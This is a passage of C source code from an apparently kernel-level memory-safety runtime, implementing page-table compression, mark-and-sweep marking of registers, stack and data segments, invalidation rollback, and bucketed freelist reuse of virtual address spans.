out_cpt_list_size() 233 | { 234 | return cpt_size; 235 | } 236 | */ 237 | 238 | static void grow_cpt_freelist(void) 239 | { 240 | char *pg; 241 | size_t i; 242 | 243 | ASSERT0(cpt_freelist == NULL); 244 | 245 | // allocate CPT_SLAB_PAGES pages (== 1 right now, so order 0) 246 | pg = (char *)__get_free_pages(GFP_NOWAIT, 0); // ptpa = pp_zalloc_one(); 247 | // memset((void*)pt, 0, PAGE_SIZE); 248 | 249 | #ifdef __TRACK_MEM_USAGE 250 | curr_pt_count++; 251 | if(curr_pt_count > max_pt_count){ 252 | max_pt_count = curr_pt_count; 253 | } 254 | #endif 255 
| 256 | // pg = (char *)pp_alloc(CPT_SLAB_PAGES); 257 | // if (!pg) { 258 | // vdprintf_nomalloc("Could not allocate cpt page\n"); 259 | // _dangless_assert_fail(); 260 | // } 261 | 262 | for (i = 0; i + CPT_SIZE_BYTES < CPT_SLAB_SIZE; i += CPT_SIZE_BYTES) { 263 | cpt_t **cpt = (cpt_t **)&pg[i]; 264 | *cpt = cpt_freelist; 265 | cpt_freelist = cpt; 266 | // temp 267 | //cpt_size++; 268 | } 269 | } 270 | 271 | cpt_t *cpt_alloc(void) 272 | { 273 | void *ret; 274 | 275 | if (!cpt_freelist) 276 | grow_cpt_freelist(); 277 | 278 | ret = cpt_freelist; 279 | cpt_freelist = *((cpt_t **)cpt_freelist); 280 | // temp 281 | //cpt_size--; 282 | 283 | //LOG("cpt alloc: %lx\n", ret); 284 | return ret; 285 | } 286 | 287 | void cpt_free(cpt_t *cpt) 288 | { 289 | *((cpt_t **)cpt) = cpt_freelist; 290 | cpt_freelist = cpt; 291 | 292 | // temp 293 | //cpt_size++; 294 | 295 | /* TODO: give back fully freed cpt pages to physmem allocator. 296 | * how do we do this? We'd need per-page or per slab metadata... and 297 | * a doubly-linked list to remove arbitrary entries. */ 298 | } 299 | 300 | void cpt_destruct(void) 301 | { 302 | // free the pages in the compression freelist 303 | cpt_t* curr; 304 | while(cpt_freelist != NULL){ 305 | curr = cpt_freelist; 306 | cpt_freelist = *((cpt_t **)cpt_freelist); 307 | 308 | if( ((uintptr_t)curr & 0xfff) == 0){ // page-aligned 309 | free_pages((unsigned long)curr, 0); 310 | } 311 | } 312 | } 313 | 314 | void cpt_nuke(void) 315 | { 316 | cpt_freelist = NULL; 317 | } 318 | 319 | void uncompress_cpt_to_pt(cpt_t *cpt, pte_t *pt) 320 | { 321 | size_t i; 322 | 323 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 324 | pt[i] = PTE_EMPTY; 325 | if (cpt_get_entry(cpt, i, CPT_OBJEND)) 326 | pt[i] |= PTE_OBJEND; 327 | if (cpt_get_entry(cpt, i, CPT_INVALIDATED)) 328 | pt[i] |= PTE_INVALIDATED; 329 | } 330 | } 331 | 332 | pte_t* uncompress_pte(enum pt_level level, pte_t *pte) 333 | { 334 | paddr_t ptpa; 335 | pte_t *pt; 336 | size_t i; 337 | 338 | (void)level; 339 | ASSERT0(level == PT_L2); 340 | ASSERT0(pte_is_compressed(*pte, level)); 341 | 342 | pt = (pte_t*)__get_free_pages(GFP_NOWAIT, 0); // ptpa = pp_zalloc_one(); 343 | memset((void*)pt, 0, PAGE_SIZE); 344 | if (!pt) { 345 | printf("failed to allocate pagetable page!\n"); 346 | return NULL; 347 | } 348 | 349 | #ifdef __TRACK_MEM_USAGE 350 | curr_pt_count++; 351 | if(curr_pt_count > max_pt_count){ 352 | max_pt_count = curr_pt_count; 353 | } 354 | #endif 355 | 356 | ptpa = virt_to_phys(pt); // pt = pt_paddr2vaddr(ptpa); 357 | 358 | if ((*pte & PTE_CMS_ONEBIG) || (*pte & PTE_CMS_ALLSMALL)) { 359 | //LOG("Uncompressing compact PTE %lx\n", *pte); 360 | pte_t pte_bits = PTE_INVALIDATED; 361 | if (*pte & PTE_CMS_ALLSMALL) 362 | pte_bits |= PTE_OBJEND; 363 | 364 | for (i = 0; i < PT_NUM_ENTRIES; i++) 365 | pt[i] = pte_bits; 366 | } else { 367 | cpt_t *cpt = (cpt_t *)((*pte & PTE_FRAME_CPT) + PAGE_OFFSET); 368 | //LOG(" uncompressing cpt %p to pt %p\n", cpt, pt); 369 | uncompress_cpt_to_pt(cpt, pt); 370 | cpt_free(cpt); 371 | } 372 | 373 | *pte = (pte_t)ptpa | PTE_ALIASSES | PTE_NX | PTE_W | PTE_P; 374 | return pt; 375 | } 376 | 377 | void compress_pt_to_cpt(pte_t *pt, cpt_t *cpt) 378 | { 379 | size_t i; 380 | 381 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 382 | bool objend = !!(pt[i] & PTE_OBJEND); 383 | bool invalidated = !!(pt[i] & PTE_INVALIDATED); 384 | 385 | ASSERT0(!(pt[i] & PTE_P)); 386 | 387 | cpt_set_entry(cpt, i, CPT_OBJEND, objend); 388 | cpt_set_entry(cpt, i, CPT_INVALIDATED, invalidated); 389 | } 390 | } 391 | 392 | static enum 
compression_type pt_is_compressable(pte_t *pt) 393 | { 394 | unsigned pte_idx; 395 | unsigned num_objends = 0; 396 | 397 | for (pte_idx = 0; pte_idx < PT_NUM_ENTRIES; pte_idx++) { 398 | if (!(pt[pte_idx] & PTE_INVALIDATED)) 399 | return COMPRESSION_NONE; 400 | if (pt[pte_idx] & PTE_OBJEND) 401 | num_objends++; 402 | } 403 | 404 | if (num_objends == 0) 405 | return COMPRESSION_ONEBIG; 406 | else if (num_objends == PT_NUM_ENTRIES) 407 | return COMPRESSION_ALLSMALL; 408 | else 409 | return COMPRESSION_NORMAL; 410 | } 411 | 412 | 413 | static void try_compress_pt_rec(vaddr_t va, 414 | vaddr_t va_end, 415 | enum pt_level level, 416 | pte_t *pt) 417 | { 418 | const size_t level_inc = 1UL << pt_level_shift(level); 419 | vaddr_t va_level_next, va_level_end; 420 | pte_t *ppte, *nextpt; 421 | size_t ptoff; 422 | paddr_t nextpt_pa; 423 | 424 | ASSERT0(level > PT_L1); 425 | 426 | while (va < va_end) { 427 | ptoff = pt_level_offset(va, level); 428 | va_level_next = (va + level_inc) & ~(level_inc - 1); 429 | va_level_end = va_end < va_level_next ? va_end : va_level_next; 430 | 431 | ppte = &pt[ptoff]; 432 | //LOG("pt%d va=%#lx pt=%p off=%zx pte=%lx\n", level, va, pt, ptoff, *ppte); 433 | if (!FLAG_ISSET(*ppte, PTE_P) || FLAG_ISSET(*ppte, PTE_PS)) 434 | return; 435 | 436 | nextpt_pa = *ppte & PTE_FRAME; 437 | nextpt = (pte_t*)pt_paddr2vaddr(nextpt_pa); 438 | 439 | if (level > PT_L2) 440 | try_compress_pt_rec(va, va_level_end, level - 1, nextpt); 441 | else if (level == PT_L2) { 442 | enum compression_type type = pt_is_compressable(nextpt); 443 | if (type == COMPRESSION_NORMAL) { 444 | cpt_t *cpt = cpt_alloc(); 445 | compress_pt_to_cpt(nextpt, cpt); 446 | 447 | //LOG(" ########## pt%d empty for va=%lx, compressing %lx to %p in pte %p\n", 448 | // level - 1, va, nextpt_pa, cpt, ppte); 449 | 450 | *ppte = (pte_t)virt_to_phys(cpt) | PTE_COMPRESSED; 451 | //LOG("New PTE: %lx\n", *ppte); 452 | //pp_free_one(nextpt_pa); 453 | free_pages((unsigned long)nextpt, 0); 454 | #ifdef __TRACK_MEM_USAGE 455 | curr_pt_count--; 456 | #endif 457 | } else if (type == COMPRESSION_ONEBIG || 458 | type == COMPRESSION_ALLSMALL) { 459 | //LOG(" ########## pt%d very empty for va=%lx, compressing %lx to %s in pte %p\n", 460 | // level - 1, va, nextpt_pa, type == COMPRESSION_ONEBIG ? "ONEBIG" : "ALLSMALL", ppte); 461 | *ppte = PTE_COMPRESSED; 462 | if (type == COMPRESSION_ONEBIG) 463 | *ppte |= PTE_CMS_ONEBIG; 464 | else if (type == COMPRESSION_ALLSMALL) 465 | *ppte |= PTE_CMS_ALLSMALL; 466 | 467 | //pp_free_one(nextpt_pa); 468 | free_pages((unsigned long)nextpt, 0); 469 | #ifdef __TRACK_MEM_USAGE 470 | curr_pt_count--; 471 | #endif 472 | } 473 | } 474 | va = va_level_next; 475 | 476 | //LOG("pt%d next va=%p end=%p next_freed=%u freed=%u\n", level, va, va_end, next_freed, freed); 477 | 478 | } 479 | } 480 | 481 | // TODO do we ever need to compress pages with non-invalidated entries? 482 | // i.e., compress fully invalidated ones, throw away fully reusable ones, leave 483 | // mixed ones? 
we can also have 2 compressed formats 484 | void try_compress_pt(vaddr_t va, size_t npages) 485 | { 486 | vaddr_t va_end = PG_OFFSET(va, npages); 487 | pte_t *ptroot = (pte_t*)g_cr3; 488 | //LOG("==================================================================\n"); 489 | //LOG("Compressing %lx - %lx (%zx pages)\n", va, va_end, npages); 490 | 491 | 492 | try_compress_pt_rec(va, va_end, PT_L4, ptroot); 493 | } 494 | 495 | ///// marking ///// 496 | static int mark_ptr_rec(uintptr_t ptr, enum pt_level level, pte_t *pt); 497 | int mark_ptr(uintptr_t ptr) 498 | { 499 | int ret; 500 | //LOG("GC mark %#lx\n", ptr); 501 | ret = mark_ptr_rec(ptr, PT_L4, g_cr3); 502 | return ret; 503 | } 504 | 505 | static int mark_compressed_pte(uintptr_t ptr, enum pt_level level, pte_t *pte) 506 | { 507 | pte_t *nextpt; 508 | pte_t *ret; 509 | 510 | ASSERT0(level == PT_L2); 511 | ASSERT0(pte_is_compressed(*pte, level)); 512 | 513 | if (*pte & PTE_CMS_ONEBIG) { 514 | //LOG("Marking ONEBIG %lx\n", ptr); 515 | return 0; /* Leave compressed, mark_ptr_rec sets PTE_MARKED. */ 516 | } 517 | 518 | ret = uncompress_pte(level, pte); 519 | if (ret == NULL) 520 | return -1; 521 | 522 | uintptr_t frame = *pte & PTE_FRAME; 523 | if(frame == 0) return 0; 524 | nextpt = (pte_t *)pt_paddr2vaddr(frame); 525 | mark_ptr_rec(ptr, level - 1, nextpt); 526 | return 0; 527 | } 528 | 529 | static int mark_ptr_rec(uintptr_t ptr, enum pt_level level, pte_t *pt) 530 | { 531 | size_t ptoff; 532 | pte_t *pte, *nextpt; 533 | bool is_compressed = false; 534 | 535 | ptoff = pt_level_offset(ptr, level); 536 | pte = &pt[ptoff]; 537 | 538 | #ifdef __GC_PT_COMPRESS 539 | is_compressed = pte_is_compressed(*pte, level); 540 | #endif 541 | 542 | /* Avoid creating page tables for areas we never allocated/invalidated. */ 543 | if (level > PT_L1 && !(*pte & PTE_ALIASSES) && !is_compressed) 544 | return 0; 545 | 546 | /* Avoid needless setting/unsetting of marked bits. 
*/ 547 | if (level == PT_L1 && !(*pte & PTE_INVALIDATED)) 548 | return 0; 549 | 550 | if (level > PT_L1) { 551 | ASSERT0(!(*pte & PTE_PS) || is_compressed); 552 | ASSERT0(!(*pte & PTE_INVALIDATED) || is_compressed); 553 | #ifdef __GC_PT_COMPRESS 554 | if (is_compressed) { 555 | if (mark_compressed_pte(ptr, level, pte)) 556 | return -1; 557 | } else 558 | #endif 559 | { 560 | // for some reason *pte&frame == 0 is not caught 561 | uintptr_t frame = *pte & PTE_FRAME; 562 | if(frame == 0) return 0; 563 | 564 | nextpt = (pte_t *)pt_paddr2vaddr(frame); 565 | if (mark_ptr_rec(ptr, level - 1, nextpt)) 566 | return -1; 567 | } 568 | } 569 | 570 | *pte |= PTE_MARKED; 571 | return 0; 572 | } 573 | 574 | static void mark_regs(void) 575 | { 576 | size_t i; 577 | struct { 578 | unsigned long rax, rbx, rcx, rdx, rsi, rdi, rbp, 579 | r8, r9, r10, r11, r12, r13, r14, r15; 580 | } regs; 581 | 582 | #if 0 583 | char *regnames[] = {"rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", 584 | "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"}; 585 | #endif 586 | 587 | asm ("mov %%rax, 0(%0) \n\t" 588 | "mov %%rbx, 8(%0) \n\t" 589 | "mov %%rcx, 16(%0) \n\t" 590 | "mov %%rdx, 24(%0) \n\t" 591 | "mov %%rsi, 32(%0) \n\t" 592 | "mov %%rdi, 40(%0) \n\t" 593 | "mov %%rbp, 48(%0) \n\t" 594 | "mov %%r8, 56(%0) \n\t" 595 | "mov %%r9, 64(%0) \n\t" 596 | "mov %%r10, 72(%0) \n\t" 597 | "mov %%r11, 80(%0) \n\t" 598 | "mov %%r12, 88(%0) \n\t" 599 | "mov %%r13, 96(%0) \n\t" 600 | "mov %%r14, 104(%0) \n\t" 601 | "mov %%r15, 112(%0) \n\t" 602 | : 603 | : "r"(®s) 604 | : "memory"); 605 | 606 | #if 0 607 | for (i = 0; i < sizeof(regs) / 8; i++) 608 | LOG(" %s: %016lx\n", regnames[i], ((unsigned long*)®s)[i]); 609 | #endif 610 | 611 | for (i = 0; i < sizeof(regs) / 8; i++) { 612 | uintptr_t v = ((uintptr_t*)®s)[i]; 613 | if (is_potential_ptr(v)) 614 | mark_ptr(v); 615 | } 616 | } 617 | 618 | static void mark_stack(void) 619 | { 620 | uintptr_t *sp, *top; 621 | 622 | sp = (uintptr_t *)get_stack_pointer(); 623 | top = (uintptr_t *)stack_top; 624 | 625 | for (; sp < top; sp++) { 626 | if (is_potential_ptr(*sp)){ 627 | mark_ptr(*sp); 628 | } 629 | } 630 | } 631 | 632 | static void mark_datasegs(void) 633 | { 634 | /* TODO data/bss of libs? */ 635 | 636 | uintptr_t *iter; 637 | 638 | for (iter = (uintptr_t*)bss_start; iter < (uintptr_t*)bss_end; iter++) 639 | if (is_potential_ptr(*iter)) 640 | mark_ptr(*iter); 641 | 642 | for (iter = (uintptr_t*)data_start; iter < (uintptr_t*)data_end; iter++) 643 | if (is_potential_ptr(*iter)) 644 | mark_ptr(*iter); 645 | } 646 | 647 | 648 | ///////// sweeping ///////// 649 | static void rollback_invalidations_compressed(vaddr_t va, 650 | vaddr_t va_end, 651 | vaddr_t obj_end_va, 652 | cpt_t *cpt) 653 | { 654 | size_t i, idx_start, idx_end, idx_obj_end; 655 | 656 | idx_start = pt_level_offset(va, PT_L1); 657 | idx_end = pt_level_offset(va_end, PT_L1); 658 | idx_obj_end = obj_end_va <= va_end ? 
pt_level_offset(obj_end_va, PT_L1) 659 | : PT_NUM_ENTRIES; 660 | if (idx_end == 0) idx_end = PT_NUM_ENTRIES; 661 | 662 | (void)idx_obj_end; 663 | //LOG("rbci %zu %zu (%zu)\n", idx_start, idx_end, idx_obj_end); 664 | 665 | for (i = idx_start; i < idx_end; i++) { 666 | //LOG("rbc idx=%zu objend=%zu\n", i, idx_obj_end); 667 | cpt_set_entry(cpt, i, CPT_INVALIDATED, 1); 668 | } 669 | } 670 | 671 | static void rollback_invalidations_rec(vaddr_t va, 672 | vaddr_t va_end, 673 | vaddr_t obj_end_va, 674 | enum pt_level level, 675 | pte_t *pt) 676 | { 677 | const size_t level_inc = 1UL << pt_level_shift(level); 678 | vaddr_t va_level_next, va_level_end; 679 | pte_t *pte, *nextpt; 680 | 681 | while (va < va_end) { 682 | va_level_next = (va + level_inc) & ~(level_inc - 1); 683 | va_level_end = va_end < va_level_next ? va_end : va_level_next; 684 | pte = &pt[pt_level_offset(va, level)]; 685 | 686 | //LOG("rb pt%d va=%#lx pte=%p *pte=%lx (nxt=%lx end=%lx)\n", level, va, pte, *pte, va_level_next, va_end); 687 | 688 | if (level > PT_L1 && !(*pte & PTE_P) && !pte_is_compressed(*pte, level)) { 689 | /* We (overoptimistically) cleared away an entire pgtable and need 690 | * to (re)allocate one. We know a cpt is always fine for this, 691 | * optionally we can use a ONEBIG entry. */ 692 | #ifdef __GC_PT_COMPRESS 693 | if (level > PT_L2) { 694 | #else 695 | if (level >= PT_L2) { 696 | #endif 697 | // NOTE: a rollback can never increase max mem usage curr_pt 698 | pte_t* temp_pt = (pte_t*)__get_free_pages(GFP_NOWAIT, 0); // paddr_t ptpa = pp_zalloc_one(); 699 | memset((void*)temp_pt, 0, PAGE_SIZE); 700 | 701 | #ifdef __TRACK_MEM_USAGE 702 | curr_pt_count++; 703 | if(curr_pt_count > max_pt_count){ 704 | max_pt_count = curr_pt_count; 705 | } 706 | #endif 707 | 708 | paddr_t ptpa = virt_to_phys(temp_pt); 709 | ASSERT0(ptpa); 710 | *pte = (pte_t)ptpa | PTE_ALIASSES | PTE_NX | PTE_W | PTE_P; 711 | } else if (level == PT_L2) { 712 | if ((va & (level_inc - 1)) == 0 && va_level_end == va_level_next) { 713 | *pte = PTE_CMS_ONEBIG; 714 | } else { 715 | size_t i; 716 | cpt_t *cpt = cpt_alloc(); 717 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 718 | cpt_set_entry(cpt, i, CPT_OBJEND, 0); 719 | cpt_set_entry(cpt, i, CPT_INVALIDATED, 0); 720 | } 721 | //*pte = (pte_t)cpt | PTE_COMPRESSED; 722 | *pte = (pte_t)virt_to_phys(cpt) | PTE_COMPRESSED; 723 | } 724 | } 725 | } 726 | 727 | if (level == PT_L1) { 728 | ASSERT0(*pte == PTE_EMPTY); 729 | *pte = PTE_INVALIDATED; 730 | if (va == obj_end_va) 731 | *pte = PTE_OBJEND; 732 | 733 | } else if (pte_is_compressed(*pte, level)) { 734 | ASSERT0(level == PT_L2); 735 | cpt_t *cpt = (void*)((*pte & PTE_FRAME_CPT) + PAGE_OFFSET); 736 | rollback_invalidations_compressed(va, va_level_end, obj_end_va, 737 | cpt); 738 | 739 | } else if (!(*pte & PTE_P) && (*pte & PTE_CMS_ONEBIG)) { 740 | ASSERT0(!(*pte & PTE_COMPRESSED)); 741 | ASSERT0(!(*pte & PTE_MARKED)); 742 | *pte |= PTE_COMPRESSED; 743 | 744 | } else { 745 | ASSERT0(*pte & PTE_P); 746 | nextpt = (pte_t*)pt_paddr2vaddr(*pte & PTE_FRAME); 747 | rollback_invalidations_rec(va, va_level_end, obj_end_va, level - 1, 748 | nextpt); 749 | } 750 | 751 | va = va_level_next; 752 | } 753 | } 754 | 755 | /* 756 | * During sweeping we optimistically undo the invalidation of PTEs, which we may 757 | * need to roll back later if one of the objects' pages was marked. 
758 | */ 759 | void rollback_invalidations(vaddr_t start, 760 | size_t npages_cleared, 761 | size_t npages_total) 762 | { 763 | vaddr_t va_end = PG_OFFSET(start, npages_cleared); 764 | vaddr_t obj_end_va = PG_OFFSET(start, npages_total); 765 | pte_t *ptroot = (pte_t*)g_cr3; 766 | 767 | //LOG("Reinvalidating %lx-%lx(-%lx)\n", start, va_end, obj_end_va); 768 | //fprintf(stderr, "ROLLBACK: %lx - %lx (end %lx)\n", start, va_end, obj_end_va); 769 | 770 | ASSERT0((start & (PGSIZE - 1)) == 0); 771 | ASSERT0(npages_cleared > 0); 772 | ASSERT0(npages_cleared <= npages_total); 773 | 774 | rollback_invalidations_rec(start, va_end, obj_end_va, PT_L4, ptroot); 775 | } 776 | 777 | static vaddr_t sweep_curobj_start, sweep_curobj_end; 778 | static bool sweep_curobj_marked; 779 | static size_t sweep_curobj_num_cleared; 780 | 781 | static inline void sweep_curobj_reset(void) 782 | { 783 | sweep_curobj_end = 0; 784 | sweep_curobj_marked = 0; 785 | sweep_curobj_num_cleared = 0; 786 | } 787 | 788 | static bool sweep_pt_rec(enum pt_level level, pte_t *pt, 789 | size_t idx_start, size_t idx_end, vaddr_t partial_va); 790 | static void sweep_all(void) 791 | { 792 | pte_t *pt = (pte_t*)g_cr3; 793 | size_t ptoff_start = pt_level_offset(SHADOW_BASE, PT_L4); 794 | size_t ptoff_end = pt_level_offset(highest_shadow, PT_L4); // SHADOW_END 795 | 796 | if(ptoff_end == ptoff_start) 797 | ptoff_end++; 798 | 799 | LOG("sweep from pt: %p L4 ids: %lu %lu\n", pt, ptoff_start, ptoff_end); 800 | sweep_curobj_reset(); 801 | sweep_pt_rec(PT_L4, pt, ptoff_start, ptoff_end, 0); 802 | } 803 | 804 | void cascade_bucket_ptrs(unsigned b, struct vp_span* old, struct vp_span* new) 805 | { 806 | // upon merge-into-next, a bucket ptr can move 807 | // if other bucket ptrs pointed to the same span 808 | // they should move with, because the old-next gets freed 809 | // search left buckets is not needed 810 | // smaller cannot share ptr 811 | 812 | // smaller buckets do not have to be searched, 813 | // since they cannot point to a larger bucket's span 814 | 815 | // the mega span 816 | if(old->end > highest_shadow){ 817 | return; 818 | } 819 | 820 | // other bucket ptrs only relevant if the span is large enough 821 | unsigned end_bucket = ((old->end - SHADOW_BASE) / bucket_size); 822 | 823 | // search right buckets 824 | for(unsigned s = b+1; b <= end_bucket; b++){ 825 | if(sub_spans[s] != NULL){ 826 | if(sub_spans[s] == old){ 827 | sub_spans[s] = new; 828 | } 829 | else{ 830 | // next span is not shared, stop search 831 | break; 832 | } 833 | } 834 | } 835 | } 836 | 837 | struct vp_span* b_try_merge(unsigned b, struct vp_span* left, struct vp_span* right) 838 | { 839 | if (left->end != right->start) 840 | return NULL; 841 | 842 | cascade_bucket_ptrs(b, right, left); 843 | 844 | // test 845 | // left->last_sync = false; 846 | 847 | // merge 'right' into 'left' 848 | left->end = right->end; 849 | // disable (gc) 850 | #ifdef WM_ZERO 851 | right->start = 0; right->end = 0; 852 | #endif 853 | LIST_REMOVE(right, freelist); 854 | WM_FREE(right); 855 | 856 | return left; 857 | } 858 | 859 | static void add_for_reuse(vaddr_t va, size_t npages) 860 | { 861 | // TODO: batch this operation? 
virtmem_alloc already merges spans 862 | 863 | // bucketing 864 | #if (NUM_BUCKETS == 1) 865 | freelist_free(opt_freelist, (void*)va, npages); 866 | #else 867 | unsigned bucket = ((va - SHADOW_BASE) / bucket_size); 868 | 869 | ASSERT0(bucket < NUM_BUCKETS); 870 | 871 | vaddr_t start = va; 872 | vaddr_t end = PG_OFFSET(start, npages); 873 | 874 | /* 875 | try bucket b: if null -> the area is not covered -> move left 876 | if not null: iterate upwards to find its destination 877 | update the concerned sub spans bucket ptrs 878 | */ 879 | 880 | int b = bucket; 881 | bool found = false; 882 | 883 | // if list is completely empty 884 | struct vp_freelist *list = opt_freelist; 885 | if(LIST_EMPTY(&list->items) || opt_freelist->items.lh_first == NULL){ 886 | //fprintf(stderr, "list is empty. new span (bucket %u)\n", b); 887 | // create new span 888 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 889 | span->start = start; 890 | span->end = end; 891 | span->last_sync = false; 892 | LIST_INSERT_HEAD(&list->items, span, freelist); 893 | // update bucket ptr 894 | // sub_spans[b] = span; 895 | 896 | // get end_bucket of 'end' 897 | unsigned end_bucket = ((end - SHADOW_BASE) / bucket_size); 898 | for(; b <= end_bucket; b++){ 899 | sub_spans[b] = span; 900 | } 901 | return; 902 | } 903 | 904 | // if dest. bucket is empty 905 | if(sub_spans[b] == NULL){ 906 | //fprintf(stderr, "bucket %u is empty, find prev\n", b); 907 | // find the previous bucket with content s.t. we can insert 908 | if(b > 0){ 909 | for(; b >= 0; b--){ // b = b-1? 910 | if(sub_spans[b] != NULL){ 911 | found = true; 912 | break; 913 | } 914 | } 915 | } 916 | if(!found){ 917 | // no previous -> span becomes the list head 918 | // insert before the current head 919 | struct vp_span *head = list->items.lh_first; 920 | 921 | // can merge? 
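// (no earlier bucket holds a span, so nothing precedes this range in the
//  list: either the range ends exactly where the current head starts, in
//  which case the head is simply extended downwards, or a fresh span is
//  allocated and inserted before the head, and the bucket pointers covering
//  the range are updated to point at whichever span results)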
922 | if(end == head->start){ 923 | //fprintf(stderr, "no prev found, can merge with head\n"); 924 | head->start = start; 925 | head->last_sync = false; 926 | sub_spans[bucket] = head; 927 | } 928 | else{ 929 | //fprintf(stderr, "no prev found, new head\n"); 930 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 931 | span->start = start; 932 | span->end = end; 933 | span->last_sync = false; 934 | LIST_INSERT_BEFORE(head, span, freelist); 935 | //sub_spans[bucket] = span; 936 | // get end_bucket of 'end' 937 | unsigned end_bucket = ((end - SHADOW_BASE) / bucket_size); 938 | for(; bucket <= end_bucket; bucket++){ 939 | sub_spans[bucket] = span; 940 | } 941 | } 942 | return; 943 | } 944 | 945 | //fprintf(stderr, "prev of empty bucket is bucket %u\n", b); 946 | } 947 | 948 | //fprintf(stderr, "using bucket %u for insertion (og %u)\n", b, bucket); 949 | 950 | // bucket 'b' should concern insertion 951 | // bucket 'bucket' still needs potential pointer update 952 | 953 | // cascading bucket pointer updates: 954 | // not needed for insert-before: they would not contain the other bucket 955 | // not needed for merge with prev: span ptr stays intact 956 | // is needed for merge with next: new span can join on the left side, 957 | // essentially freeing the next 958 | 959 | struct vp_span *prev=NULL, *next; 960 | for(next = sub_spans[b]; next != NULL; next = next->freelist.le_next){ 961 | if(next->start >= end){ 962 | break; 963 | } 964 | prev = next; 965 | } 966 | 967 | // try merge with prev 968 | if(prev != NULL && prev->end == start){ 969 | prev->end = end; 970 | // test 971 | // prev->last_sync = false; 972 | if(next != NULL){ // next is not end 973 | b_try_merge(b, prev, next); 974 | } 975 | //fprintf(stderr, "merging with prev: %lx\n", prev->start); 976 | 977 | if(found){ 978 | sub_spans[bucket] = prev; 979 | // bucket came from NULL, so nothing depends on it 980 | } 981 | return; 982 | } 983 | 984 | // try merge with next 985 | if(next != NULL && next->start == end){ 986 | next->start = start; 987 | next->last_sync = false; 988 | if(prev != NULL){ 989 | if(b_try_merge(b, prev, next) != NULL){ 990 | if(found){ 991 | sub_spans[bucket] = prev; 992 | return; 993 | } 994 | } 995 | } 996 | 997 | if(found){ 998 | sub_spans[bucket] = next; 999 | // bucket came from NULL, so nothing depends on it 1000 | } 1001 | //fprintf(stderr, "merging with next: %lx\n", next->end); 1002 | return; 1003 | } 1004 | 1005 | // could not merge in current bucket range 1006 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 1007 | if (UNLIKELY(!span)) { 1008 | LOG("could not allocate vp_span: out of memory?\n"); 1009 | return; 1010 | } 1011 | span->start = start; 1012 | span->end = end; 1013 | span->last_sync = false; 1014 | 1015 | if(found){ 1016 | // if the bucket ptr was empty, let it point to new span 1017 | //sub_spans[bucket] = span; 1018 | // get end_bucket of 'end' 1019 | unsigned end_bucket = ((end - SHADOW_BASE) / bucket_size); 1020 | for(; bucket <= end_bucket; bucket++){ 1021 | sub_spans[bucket] = span; 1022 | } 1023 | } 1024 | 1025 | //fprintf(stderr, "could not merge. new span\n"); 1026 | 1027 | if(prev){ 1028 | LIST_INSERT_AFTER(prev, span, freelist); 1029 | } else if(next != NULL){ // next is not end of list (NULL) 1030 | LIST_INSERT_BEFORE(next, span, freelist); 1031 | if(next == sub_spans[bucket]){ 1032 | // we inserted before the bucket ptr. update. 1033 | sub_spans[bucket] = span; 1034 | } 1035 | /*if(next == sub_spans[b]){ 1036 | // ?? 
is this even possible 1037 | sub_spans[b] = span; 1038 | }*/ 1039 | } 1040 | #endif 1041 | //LOG("we can add VA=%p to free list!\n", (void*)va); 1042 | } 1043 | 1044 | static inline void sweep_curobj_done(void) 1045 | { 1046 | size_t npages; 1047 | // if(sweep_curobj_marked) 1048 | // LOG("Sweep obj %lx-%lx marked=%d\n", sweep_curobj_start, sweep_curobj_end, sweep_curobj_marked); 1049 | if (sweep_curobj_end) { 1050 | npages = (sweep_curobj_end - sweep_curobj_start) / PGSIZE; 1051 | 1052 | if (!sweep_curobj_marked) 1053 | add_for_reuse(sweep_curobj_start, npages); 1054 | else if (sweep_curobj_num_cleared) { 1055 | /* Roll back the un-invalidation of PTEs. */ 1056 | rollback_invalidations(sweep_curobj_start, sweep_curobj_num_cleared, npages); 1057 | } 1058 | } 1059 | sweep_curobj_reset(); 1060 | } 1061 | static inline void sweep_curobj_add(vaddr_t va, size_t npages) 1062 | { 1063 | if (sweep_curobj_end) { 1064 | //fprintf(stderr, "va %lx end %lx start %lx\n", va, sweep_curobj_end, sweep_curobj_start); 1065 | ASSERT0(va == sweep_curobj_end); 1066 | sweep_curobj_end += npages * PGSIZE; 1067 | } else { 1068 | sweep_curobj_start = va; 1069 | sweep_curobj_end = va + npages * PGSIZE; 1070 | } 1071 | } 1072 | 1073 | static bool sweep_pt_compressed_cpt(cpt_t *cpt, vaddr_t partial_va) 1074 | { 1075 | /* We are always at level PT_L1. 1076 | * We know entire thing is unmarked (otherwise mark_ptr would have 1077 | * uncompressed this entry). */ 1078 | 1079 | size_t num_free_entries = 0; 1080 | size_t i; 1081 | 1082 | //fprintf(stderr, "Start Sweeping compressed cpt=%p va=%lx\n", cpt, partial_va); 1083 | //LOG("Start Sweeping compressed cpt=%p va=%lx\n", cpt, partial_va); 1084 | //dump_cpt(cpt, partial_va); 1085 | 1086 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 1087 | bool is_objend = cpt_get_entry(cpt, i, CPT_OBJEND); 1088 | bool is_inval = cpt_get_entry(cpt, i, CPT_INVALIDATED); 1089 | bool is_marked = 0; /* XXX For when we support compressed marking. */ 1090 | vaddr_t va = partial_va | (i * PGSIZE); 1091 | 1092 | //fprintf(stderr, " sweep cpt i=%zu va=%lx curend=%lx isend=%d isinval=%d\n", i, va, sweep_curobj_end, is_objend, is_inval); 1093 | if (!is_inval) { 1094 | num_free_entries++; 1095 | continue; 1096 | } 1097 | 1098 | sweep_curobj_add(va, 1); 1099 | 1100 | if (is_marked) 1101 | sweep_curobj_marked = 1; 1102 | else if (!sweep_curobj_marked) { 1103 | //cpt_set_entry(cpt, i, CPT_OBJEND, 0); 1104 | cpt_set_entry(cpt, i, CPT_INVALIDATED, 0); 1105 | sweep_curobj_num_cleared++; 1106 | num_free_entries++; 1107 | } 1108 | 1109 | if (is_objend) 1110 | sweep_curobj_done(); 1111 | } 1112 | 1113 | //dump_cpt(cpt, partial_va); 1114 | return num_free_entries == PT_NUM_ENTRIES; 1115 | } 1116 | 1117 | static bool sweep_pt_compressed_pte(enum pt_level level, 1118 | pte_t *pte, 1119 | vaddr_t partial_va) 1120 | { 1121 | // XXX start/end idx support? 1122 | 